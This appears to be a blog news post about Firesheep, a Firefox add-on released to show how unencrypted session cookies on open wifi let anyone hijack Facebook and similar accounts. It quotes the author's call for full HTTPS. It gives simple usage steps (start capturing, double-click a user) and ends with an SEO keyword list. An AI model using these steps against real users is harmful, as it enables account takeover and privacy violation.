Firesheep: Firefox add-on allows simple HTTP session hijacking

Eric Butler, a freelance web application and software developer, has released a new Firefox add-on over the weekend called Firesheep that aims to highlight the lack of security surrounding user logins and cookies on popular websites such as Facebook.

Firesheep can be added to Firefox just like any other add-on. Once installed it displays a new sidebar that displays information about individual users logged into sites like Facebook when connected over an unsecured and open network. If a user pops up in this sidebar Firesheep allows you to login as them with a double-click of your mouse. It’s that simple.

Firesheep works due to poor security on the part of the website. While a user’s username and password may be protected with SSL encryption, the cookie the site uses is not in a lot of cases once that login has been successful. So once a user has logged in it is a simple task of hijacking the unprotected cookie taking over their account for that session.

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests.

It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.

This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.

Today at Toorcon 12 I announced the release of Firesheep, a Firefox extension designed to demonstrate just how serious this problem is.

After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.

As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed:

Double-click on someone, and you're instantly logged in as them.

That's it.

Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.

Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.






Related search

firesheep firesheeping firesheeps firesheeper sheep fire firesheep download download firesheep firesheep howto fire sheep download download fire sheep install firesheep firesheep install use firesheep firesheep extension firesheep addon installing fire sheep fire sheep install firesheep windows firesheep for windows firesheep plugin firesheep linux firesheep for linux linux firesheep firesheep backend firesheep facebook facebook firesheep firesheep chrome firesheep for chrome chrome firesheep fire sheep addon firesheep not working firesheep ubuntu using firesheep firesheep add on protect from firesheep firesheep protect firesheep windows 7 firesheep not capturing fire sheep extension firesheep tutorial firesheep websites firesheep extension download does firesheep work codebutler firesheep firesheep codebutler firesheep hack firesheep github firesheep scripts using fire sheep firesheep wifi firesheep blacksheep firesheep fix google firesheep blocking firesheep firesheep youtube protect against firesheep firesheep protection firesheep wireless firesheep block block firesheep firesheep android android firesheep firesheep for android firesheep guide eric butler firesheep firesheep program firesheep software firesheep help firesheep code prevent firesheep fire sheep facebook firesheep wep firesheep google chrome gmail firesheep firesheep gmail firesheep app firesheep wikipedia fire sheep chrome anti firesheep detect firesheep stop firesheep firesheep handlers firesheep list lifehacker firesheep firesheep vpn firesheep twitter fire sheep ubuntu firesheep video firesheep starbucks firesheep virus firesheep ssl techcrunch firesheep firesheep techcrunch firesheep mobile block fire sheep firesheeped firesheep source firesheep hotmail firesheep legal firesheep portable fire sheep instructions